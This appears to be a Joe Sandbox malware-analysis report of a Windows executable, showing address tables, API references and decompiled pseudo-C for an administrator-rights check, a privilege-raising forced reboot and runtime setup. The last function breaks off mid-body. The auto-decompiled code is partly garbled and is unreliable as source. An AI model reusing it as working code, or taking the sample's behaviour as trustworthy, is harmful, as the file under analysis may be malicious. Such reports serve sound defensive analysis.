                                                                        0x003d5e4a
                                                                        0x003d61d2
                                                                        0x003d61e2
                                                                        0x003d61e7
                                                                        0x003d61ee
                                                                        0x003d61f1
                                                                        0x003d61f1
                                                                        0x003d61f8
                                                                        0x003d61f8
                                                                        0x003d5e50
                                                                        0x003d5e53
                                                                        0x003d6109
                                                                        0x003d611f
                                                                        0x00000000
                                                                        0x003d6125
                                                                        0x003d6137
                                                                        0x003d613a
                                                                        0x003d613c
                                                                        0x003d613e
                                                                        0x003d613e
                                                                        0x003d6141
                                                                        0x003d6141
                                                                        0x003d6143
                                                                        0x003d6144
                                                                        0x003d614a
                                                                        0x00000000
                                                                        0x003d6150
                                                                        0x003d6152
                                                                        0x003d615c
                                                                        0x003d6170
                                                                        0x003d6172
                                                                        0x003d617c
                                                                        0x003d6190
                                                                        0x003d6190
                                                                        0x003d6196
                                                                        0x003d61a5
                                                                        0x00000000
                                                                        0x003d61ab
                                                                        0x003d61b9
                                                                        0x003d61c6
                                                                        0x003d61c6
                                                                        0x003d617e
                                                                        0x003d6180
                                                                        0x003d618a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d618a
                                                                        0x003d615e
                                                                        0x003d6160
                                                                        0x003d616a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d616a
                                                                        0x003d615c
                                                                        0x003d614a
                                                                        0x003d610b
                                                                        0x003d610e
                                                                        0x003d610e
                                                                        0x00000000
                                                                        0x003d5e59
                                                                        0x003d5e59
                                                                        0x003d5e5c
                                                                        0x003d604f
                                                                        0x003d6056
                                                                        0x00000000
                                                                        0x003d605c
                                                                        0x003d606e
                                                                        0x003d6071
                                                                        0x003d6073
                                                                        0x003d6075
                                                                        0x003d6075
                                                                        0x003d6078
                                                                        0x003d6078
                                                                        0x003d607a
                                                                        0x003d607b
                                                                        0x003d6081
                                                                        0x00000000
                                                                        0x003d6087
                                                                        0x003d6087
                                                                        0x003d608d
                                                                        0x003d609c
                                                                        0x00000000
                                                                        0x003d60a2
                                                                        0x003d60aa
                                                                        0x003d60b2
                                                                        0x003d60b7
                                                                        0x003d60bd
                                                                        0x003d60bf
                                                                        0x003d60bf
                                                                        0x003d60d6
                                                                        0x003d60e0
                                                                        0x003d60e7
                                                                        0x003d60f5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d60f5
                                                                        0x003d609c
                                                                        0x003d6081
                                                                        0x003d5e62
                                                                        0x003d5e62
                                                                        0x003d5e65
                                                                        0x003d5fd3
                                                                        0x003d5fe9
                                                                        0x00000000
                                                                        0x003d5fef
                                                                        0x003d5fef
                                                                        0x003d5ff7
                                                                        0x003d5ffd
                                                                        0x003d6003
                                                                        0x003d6006
                                                                        0x003d6011
                                                                        0x003d6014
                                                                        0x003d603d
                                                                        0x003d6016
                                                                        0x003d6018
                                                                        0x003d6019
                                                                        0x003d601b
                                                                        0x003d6033
                                                                        0x003d601d
                                                                        0x003d6020
                                                                        0x003d6029
                                                                        0x003d6022
                                                                        0x003d6022
                                                                        0x003d6022
                                                                        0x003d6020
                                                                        0x003d601b
                                                                        0x003d6042
                                                                        0x003d6044
                                                                        0x003d6046
                                                                        0x003d604a
                                                                        0x003d5ff7
                                                                        0x003d5fd5
                                                                        0x003d5fd8
                                                                        0x003d5fd8
                                                                        0x00000000
                                                                        0x003d5e6b
                                                                        0x003d5e6b
                                                                        0x003d5e6e
                                                                        0x003d5f8b
                                                                        0x003d5f99
                                                                        0x00000000
                                                                        0x003d5f9f
                                                                        0x003d5fa7
                                                                        0x003d5faf
                                                                        0x00000000
                                                                        0x003d5fb1
                                                                        0x003d5fb3
                                                                        0x00000000
                                                                        0x003d5fb5
                                                                        0x003d5fb7
                                                                        0x00000000
                                                                        0x003d5fb9
                                                                        0x00000000
                                                                        0x003d5fb9
                                                                        0x003d5fb7
                                                                        0x003d5fb3
                                                                        0x003d5faf
                                                                        0x003d5f8d
                                                                        0x003d5f8d
                                                                        0x003d5f8d
                                                                        0x003d5f8f
                                                                        0x003d5fc1
                                                                        0x003d5fc1
                                                                        0x003d5fc1
                                                                        0x00000000
                                                                        0x003d5e74
                                                                        0x003d5e74
                                                                        0x003d5e77
                                                                        0x003d5ea0
                                                                        0x003d5ebd
                                                                        0x003d5f79
                                                                        0x00000000
                                                                        0x003d5f7f
                                                                        0x003d5ec3
                                                                        0x003d5ec3
                                                                        0x003d5ecc
                                                                        0x003d5ed4
                                                                        0x003d5ed6
                                                                        0x003d5edc
                                                                        0x003d5edf
                                                                        0x003d5eea
                                                                        0x003d5eed
                                                                        0x003d5f3f
                                                                        0x003d5f40
                                                                        0x00000000
                                                                        0x003d5eef
                                                                        0x003d5eef
                                                                        0x003d5ef2
                                                                        0x003d5f34
                                                                        0x003d5ef4
                                                                        0x003d5ef4
                                                                        0x003d5ef7
                                                                        0x003d5f2b
                                                                        0x00000000
                                                                        0x003d5ef9
                                                                        0x003d5ef9
                                                                        0x003d5efc
                                                                        0x003d5f22
                                                                        0x00000000
                                                                        0x003d5efe
                                                                        0x003d5eff
                                                                        0x003d5f02
                                                                        0x003d5f16
                                                                        0x003d5f04
                                                                        0x003d5f07
                                                                        0x003d5f0d
                                                                        0x003d5f46
                                                                        0x003d5f46
                                                                        0x003d5f09
                                                                        0x003d5f09
                                                                        0x003d5f09
                                                                        0x003d5f07
                                                                        0x003d5f02
                                                                        0x003d5efc
                                                                        0x003d5ef7
                                                                        0x003d5ef2
                                                                        0x003d5f4c
                                                                        0x003d5f4e
                                                                        0x003d5f50
                                                                        0x003d5f54
                                                                        0x003d5ed4
                                                                        0x003d5ea2
                                                                        0x003d5ea4
                                                                        0x003d5eaf
                                                                        0x003d5eaf
                                                                        0x00000000
                                                                        0x003d5e79
                                                                        0x003d5e7d
                                                                        0x00000000
                                                                        0x003d5e83
                                                                        0x003d5e83
                                                                        0x003d5e83
                                                                        0x003d5e85
                                                                        0x003d5e85
                                                                        0x003d5e8e
                                                                        0x00000000
                                                                        0x003d5e94
                                                                        0x00000000
                                                                        0x003d5e94
                                                                        0x003d5e8e
                                                                        0x003d5e7d
                                                                        0x003d5e77
                                                                        0x003d5e6e
                                                                        0x003d5e65
                                                                        0x003d5e5c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d5dd0
                                                                        0x003d5dd0
                                                                        0x003d5dd0
                                                                        0x00000000
                                                                        0x003d5dd0
                                                                        0x003d5dce
                                                                        0x003d5dca
                                                                        0x003d5dba
                                                                        0x00000000
                                                                        0x003d5d00
                                                                        0x003d5dd9
                                                                        0x003d5e04
                                                                        0x003d61fe
                                                                        0x003d5e0a
                                                                        0x003d5e0c
                                                                        0x003d5e17
                                                                        0x003d5e17
                                                                        0x003d5e04
                                                                        0x003d6200
                                                                        0x003d6200
                                                                        0x00000000

                                                                        APIs
                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 003D5CEE
                                                                        • GetModuleFileNameA.KERNEL32(003D8B3E,00000104,00000000,?,?), ref: 003D5DFC
                                                                        • CharUpperA.USER32(?), ref: 003D5E3E
                                                                        • CharUpperA.USER32(-00000052), ref: 003D5EE1
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 003D5F6F
                                                                        • CharUpperA.USER32(?), ref: 003D5FA7
                                                                        • CharUpperA.USER32(-0000004E), ref: 003D6008
                                                                        • CharUpperA.USER32(?), ref: 003D60AA
                                                                        • CloseHandle.KERNEL32(00000000,003D1140,00000000,00000040,00000000), ref: 003D61F1
                                                                        • ExitProcess.KERNEL32 ref: 003D61F8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                        • String ID: "$"$:$RegServer
                                                                        • API String ID: 1203814774-25366791
                                                                        • Opcode ID: a09698a9dfff625c2b31efedba9b16f272d3a2821aa18bae882c4eed34f97352
                                                                        • Instruction ID: 9d5ced02aa5dd75331f441caba14f2da525fa44ed02fbb92731d5f1f59482bc2
                                                                        • Opcode Fuzzy Hash: a09698a9dfff625c2b31efedba9b16f272d3a2821aa18bae882c4eed34f97352
                                                                        • Instruction Fuzzy Hash: 48D18F73A08A459FDF379B38BC497F93B6AA755300F1500A7C496CA791DA708E828F50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E003D18A3(void* __edx, void* __esi) {
                                                                        				signed int _v8;
                                                                        				short _v12;
                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                        				char _v20;
                                                                        				long _v24;
                                                                        				void* _v28;
                                                                        				void* _v32;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				signed int _t23;
                                                                        				long _t45;
                                                                        				void* _t49;
                                                                        				int _t50;
                                                                        				void* _t52;
                                                                        				signed int _t53;
                                                                        
                                                                        				_t51 = __esi;
                                                                        				_t49 = __edx;
                                                                        				_t23 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t23 ^ _t53;
                                                                        				_t25 =  *0x3d8128; // 0x2
                                                                        				_t45 = 0;
                                                                        				_v12 = 0x500;
                                                                        				_t50 = 2;
                                                                        				_v16.Value = 0;
                                                                        				_v20 = 0;
                                                                        				if(_t25 != _t50) {
                                                                        					L20:
                                                                        					return E003D6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                        				}
                                                                        				if(E003D17EE( &_v20) != 0) {
                                                                        					_t25 = _v20;
                                                                        					if(_v20 != 0) {
                                                                        						 *0x3d8128 = 1;
                                                                        					}
                                                                        					goto L20;
                                                                        				}
                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                        					L17:
                                                                        					CloseHandle(_v28);
                                                                        					_t25 = _v20;
                                                                        					goto L20;
                                                                        				} else {
                                                                        					_push(__esi);
                                                                        					_t52 = LocalAlloc(0, _v24);
                                                                        					if(_t52 == 0) {
                                                                        						L16:
                                                                        						_pop(_t51);
                                                                        						goto L17;
                                                                        					}
                                                                        					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                        						L15:
                                                                        						LocalFree(_t52);
                                                                        						goto L16;
                                                                        					} else {
                                                                        						if( *_t52 <= 0) {
                                                                        							L14:
                                                                        							FreeSid(_v32);
                                                                        							goto L15;
                                                                        						}
                                                                        						_t15 = _t52 + 4; // 0x4
                                                                        						_t50 = _t15;
                                                                        						while(EqualSid( *_t50, _v32) == 0) {
                                                                        							_t45 = _t45 + 1;
                                                                        							_t50 = _t50 + 8;
                                                                        							if(_t45 <  *_t52) {
                                                                        								continue;
                                                                        							}
                                                                        							goto L14;
                                                                        						}
                                                                        						 *0x3d8128 = 1;
                                                                        						_v20 = 1;
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        			}


















                                                                        0x003d18a3
                                                                        0x003d18a3
                                                                        0x003d18ab
                                                                        0x003d18b2
                                                                        0x003d18b5
                                                                        0x003d18be
                                                                        0x003d18c0
                                                                        0x003d18c6
                                                                        0x003d18c7
                                                                        0x003d18ca
                                                                        0x003d18cf
                                                                        0x003d19c9
                                                                        0x003d19d8
                                                                        0x003d19d8
                                                                        0x003d18df
                                                                        0x003d19b8
                                                                        0x003d19bd
                                                                        0x003d19bf
                                                                        0x003d19bf
                                                                        0x00000000
                                                                        0x003d19bd
                                                                        0x003d18fa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d1912
                                                                        0x003d19aa
                                                                        0x003d19ad
                                                                        0x003d19b3
                                                                        0x00000000
                                                                        0x003d1927
                                                                        0x003d1927
                                                                        0x003d1932
                                                                        0x003d1936
                                                                        0x003d19a9
                                                                        0x003d19a9
                                                                        0x00000000
                                                                        0x003d19a9
                                                                        0x003d194c
                                                                        0x003d19a2
                                                                        0x003d19a3
                                                                        0x00000000
                                                                        0x003d196e
                                                                        0x003d1970
                                                                        0x003d1999
                                                                        0x003d199c
                                                                        0x00000000
                                                                        0x003d199c
                                                                        0x003d1972
                                                                        0x003d1972
                                                                        0x003d1975
                                                                        0x003d1984
                                                                        0x003d1985
                                                                        0x003d198a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d198c
                                                                        0x003d1991
                                                                        0x003d1996
                                                                        0x00000000
                                                                        0x003d1996
                                                                        0x003d194c

                                                                        APIs
                                                                          • Part of subcall function 003D17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003D18DD), ref: 003D181A
                                                                          • Part of subcall function 003D17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 003D182C
                                                                          • Part of subcall function 003D17EE: AllocateAndInitializeSid.ADVAPI32(003D18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003D18DD), ref: 003D1855
                                                                          • Part of subcall function 003D17EE: FreeSid.ADVAPI32(?,?,?,?,003D18DD), ref: 003D1883
                                                                          • Part of subcall function 003D17EE: FreeLibrary.KERNEL32(00000000,?,?,?,003D18DD), ref: 003D188A
                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 003D18EB
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 003D18F2
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 003D190A
                                                                        • GetLastError.KERNEL32 ref: 003D1918
                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 003D192C
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 003D1944
                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003D1964
                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 003D197A
                                                                        • FreeSid.ADVAPI32(?), ref: 003D199C
                                                                        • LocalFree.KERNEL32(00000000), ref: 003D19A3
                                                                        • CloseHandle.KERNEL32(?), ref: 003D19AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                        • String ID:
                                                                        • API String ID: 2168512254-0
                                                                        • Opcode ID: 174bf41a7177a32ba099b3fde2b1f79cef64ea86cb66bb75748ca9b68a156929
                                                                        • Instruction ID: fdeb67db6b83cc07b9013a96612ec9b7d83091a98f880d0e3601b3bff1ba47de
                                                                        • Opcode Fuzzy Hash: 174bf41a7177a32ba099b3fde2b1f79cef64ea86cb66bb75748ca9b68a156929
                                                                        • Instruction Fuzzy Hash: 6A312D72A01609BFDB229FA5FD59AAFBBBCFF04700F104426E545D2250D7309905CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 60%
                                                                        			E003D1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				int _v12;
                                                                        				struct _TOKEN_PRIVILEGES _v24;
                                                                        				void* _v28;
                                                                        				void* __ebx;
                                                                        				signed int _t13;
                                                                        				int _t21;
                                                                        				void* _t25;
                                                                        				int _t28;
                                                                        				signed char _t30;
                                                                        				void* _t38;
                                                                        				void* _t40;
                                                                        				void* _t41;
                                                                        				signed int _t46;
                                                                        
                                                                        				_t41 = __esi;
                                                                        				_t38 = __edi;
                                                                        				_t30 = __ecx;
                                                                        				if((__ecx & 0x00000002) != 0) {
                                                                        					L12:
                                                                        					if((_t30 & 0x00000004) != 0) {
                                                                        						L14:
                                                                        						if( *0x3d9a40 != 0) {
                                                                        							_pop(_t30);
                                                                        							_t44 = _t46;
                                                                        							_t13 =  *0x3d8004; // 0xf4fc83b5
                                                                        							_v8 = _t13 ^ _t46;
                                                                        							_push(_t38);
                                                                        							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                        								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                        								_v24.PrivilegeCount = 1;
                                                                        								_v12 = 2;
                                                                        								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                        								CloseHandle(_v28);
                                                                        								_t41 = _t41;
                                                                        								_push(0);
                                                                        								if(_t21 != 0) {
                                                                        									if(ExitWindowsEx(2, ??) != 0) {
                                                                        										_t25 = 1;
                                                                        									} else {
                                                                        										_t37 = 0x4f7;
                                                                        										goto L3;
                                                                        									}
                                                                        								} else {
                                                                        									_t37 = 0x4f6;
                                                                        									goto L4;
                                                                        								}
                                                                        							} else {
                                                                        								_t37 = 0x4f5;
                                                                        								L3:
                                                                        								_push(0);
                                                                        								L4:
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								E003D44B9(0, _t37);
                                                                        								_t25 = 0;
                                                                        							}
                                                                        							_pop(_t40);
                                                                        							return E003D6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                        						} else {
                                                                        							_t28 = ExitWindowsEx(2, 0);
                                                                        							goto L16;
                                                                        						}
                                                                        					} else {
                                                                        						_t37 = 0x522;
                                                                        						_t28 = E003D44B9(0, 0x522, 0x3d1140, 0, 0x40, 4);
                                                                        						if(_t28 != 6) {
                                                                        							goto L16;
                                                                        						} else {
                                                                        							goto L14;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					__eax = E003D1EA7(__ecx);
                                                                        					if(__eax != 2) {
                                                                        						L16:
                                                                        						return _t28;
                                                                        					} else {
                                                                        						goto L12;
                                                                        					}
                                                                        				}
                                                                        			}

















                                                                        0x003d1f90
                                                                        0x003d1f90
                                                                        0x003d1f93
                                                                        0x003d1f98
                                                                        0x003d1fa4
                                                                        0x003d1fa7
                                                                        0x003d1fc5
                                                                        0x003d1fcd
                                                                        0x003d1fdb
                                                                        0x003d1ee5
                                                                        0x003d1eea
                                                                        0x003d1ef1
                                                                        0x003d1ef4
                                                                        0x003d1f0c
                                                                        0x003d1f2e
                                                                        0x003d1f3a
                                                                        0x003d1f46
                                                                        0x003d1f4d
                                                                        0x003d1f58
                                                                        0x003d1f60
                                                                        0x003d1f61
                                                                        0x003d1f62
                                                                        0x003d1f75
                                                                        0x003d1f80
                                                                        0x003d1f77
                                                                        0x003d1f77
                                                                        0x00000000
                                                                        0x003d1f77
                                                                        0x003d1f64
                                                                        0x003d1f64
                                                                        0x00000000
                                                                        0x003d1f64
                                                                        0x003d1f0e
                                                                        0x003d1f0e
                                                                        0x003d1f13
                                                                        0x003d1f13
                                                                        0x003d1f14
                                                                        0x003d1f14
                                                                        0x003d1f16
                                                                        0x003d1f17
                                                                        0x003d1f1a
                                                                        0x003d1f1f
                                                                        0x003d1f1f
                                                                        0x003d1f86
                                                                        0x003d1f8f
                                                                        0x003d1fcf
                                                                        0x003d1fd3
                                                                        0x00000000
                                                                        0x003d1fd3
                                                                        0x003d1fa9
                                                                        0x003d1fb4
                                                                        0x003d1fbb
                                                                        0x003d1fc3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d1fc3
                                                                        0x003d1f9a
                                                                        0x003d1f9a
                                                                        0x003d1fa2
                                                                        0x003d1fd9
                                                                        0x003d1fda
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d1fa2

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 003D1EFB
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 003D1F02
                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 003D1FD3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                        • String ID: SeShutdownPrivilege
                                                                        • API String ID: 2795981589-3733053543
                                                                        • Opcode ID: c3855d1bc11127e52c591b81268faeca4d7a9d2f954ac5bb968044db8ae23649
                                                                        • Instruction ID: 2b7a445aa064816febca424039e20d92776e28abe3abf27d6873725bec832014
                                                                        • Opcode Fuzzy Hash: c3855d1bc11127e52c591b81268faeca4d7a9d2f954ac5bb968044db8ae23649
                                                                        • Instruction Fuzzy Hash: AB21C7B3B412057BDB225BA1FC4AFBF77BCEB85B10F11011BFA06E6281D77488419661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D6CF0(char _a4) {
                                                                        
                                                                        				SetUnhandledExceptionFilter(0);
                                                                        				_t1 =  &_a4; // 0x3d6e26
                                                                        				UnhandledExceptionFilter( *_t1);
                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                        			}



                                                                        0x003d6cf7
                                                                        0x003d6cfd
                                                                        0x003d6d00
                                                                        0x003d6d19

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,003D6E26,003D1000), ref: 003D6CF7
                                                                        • UnhandledExceptionFilter.KERNEL32(&n=,?,003D6E26,003D1000), ref: 003D6D00
                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,003D6E26,003D1000), ref: 003D6D0B
                                                                        • TerminateProcess.KERNEL32(00000000,?,003D6E26,003D1000), ref: 003D6D12
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                        • String ID: &n=
                                                                        • API String ID: 3231755760-1620568440
                                                                        • Opcode ID: b8025f262b7f2a787bce11d21d03ded24fd2cc668d65143d1f2bcc54ebcdb6f4
                                                                        • Instruction ID: fb523d91a6f5f8b56ab204c1d5c8a29198eb5c9a1e7a39f16a6c77bad4f13b45
                                                                        • Opcode Fuzzy Hash: b8025f262b7f2a787bce11d21d03ded24fd2cc668d65143d1f2bcc54ebcdb6f4
                                                                        • Instruction Fuzzy Hash: F6D0C972005908FBDB022BF1FE0CA593F2CEB48313F444002F31A82020CA3244518B52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D7155() {
                                                                        				void* _v8;
                                                                        				struct _FILETIME _v16;
                                                                        				signed int _v20;
                                                                        				union _LARGE_INTEGER _v24;
                                                                        				signed int _t23;
                                                                        				signed int _t36;
                                                                        				signed int _t37;
                                                                        				signed int _t39;
                                                                        
                                                                        				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                        				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                        				_t23 =  *0x3d8004; // 0xf4fc83b5
                                                                        				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                        					GetSystemTimeAsFileTime( &_v16);
                                                                        					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                        					_v8 = _v8 ^ GetCurrentProcessId();
                                                                        					_v8 = _v8 ^ GetCurrentThreadId();
                                                                        					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                        					QueryPerformanceCounter( &_v24);
                                                                        					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                        					_t39 = _t36;
                                                                        					if(_t36 == 0xbb40e64e || ( *0x3d8004 & 0xffff0000) == 0) {
                                                                        						_t36 = 0xbb40e64f;
                                                                        						_t39 = 0xbb40e64f;
                                                                        					}
                                                                        					 *0x3d8004 = _t39;
                                                                        				}
                                                                        				_t37 =  !_t36;
                                                                        				 *0x3d8008 = _t37;
                                                                        				return _t37;
                                                                        			}











                                                                        0x003d715d
                                                                        0x003d7161
                                                                        0x003d7165
                                                                        0x003d7178
                                                                        0x003d7182
                                                                        0x003d718e
                                                                        0x003d7197
                                                                        0x003d71a0
                                                                        0x003d71b1
                                                                        0x003d71b8
                                                                        0x003d71c4
                                                                        0x003d71c7
                                                                        0x003d71cb
                                                                        0x003d71d5
                                                                        0x003d71da
                                                                        0x003d71da
                                                                        0x003d71dc
                                                                        0x003d71dc
                                                                        0x003d71e2
                                                                        0x003d71e5
                                                                        0x003d71ee

                                                                        APIs
                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003D7182
                                                                        • GetCurrentProcessId.KERNEL32 ref: 003D7191
                                                                        • GetCurrentThreadId.KERNEL32 ref: 003D719A
                                                                        • GetTickCount.KERNEL32 ref: 003D71A3
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 003D71B8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                        • String ID:
                                                                        • API String ID: 1445889803-0
                                                                        • Opcode ID: b083798d53a0c85cdb5034eb940c1610c4252ba77080460e0a30ae9ce3496b5f
                                                                        • Instruction ID: 90d67fe23fa38ad0c10073e8b0de9cc6947ec83554c54c5ff30156d441a22b3b
                                                                        • Opcode Fuzzy Hash: b083798d53a0c85cdb5034eb940c1610c4252ba77080460e0a30ae9ce3496b5f
                                                                        • Instruction Fuzzy Hash: 76112E71D06608EFCB11DFB8EA48A9EB7F8FF48315F654957D805E7210EB309A148B41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 76%
                                                                        			E003D3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				void* __edi;
                                                                        				void* _t6;
                                                                        				void* _t10;
                                                                        				int _t20;
                                                                        				int _t21;
                                                                        				int _t23;
                                                                        				char _t24;
                                                                        				long _t25;
                                                                        				int _t27;
                                                                        				int _t30;
                                                                        				void* _t32;
                                                                        				int _t33;
                                                                        				int _t34;
                                                                        				int _t37;
                                                                        				int _t38;
                                                                        				int _t39;
                                                                        				void* _t42;
                                                                        				void* _t46;
                                                                        				CHAR* _t49;
                                                                        				void* _t58;
                                                                        				void* _t63;
                                                                        				struct HWND__* _t64;
                                                                        
                                                                        				_t64 = _a4;
                                                                        				_t6 = _a8 - 0x10;
                                                                        				if(_t6 == 0) {
                                                                        					_push(0);
                                                                        					L38:
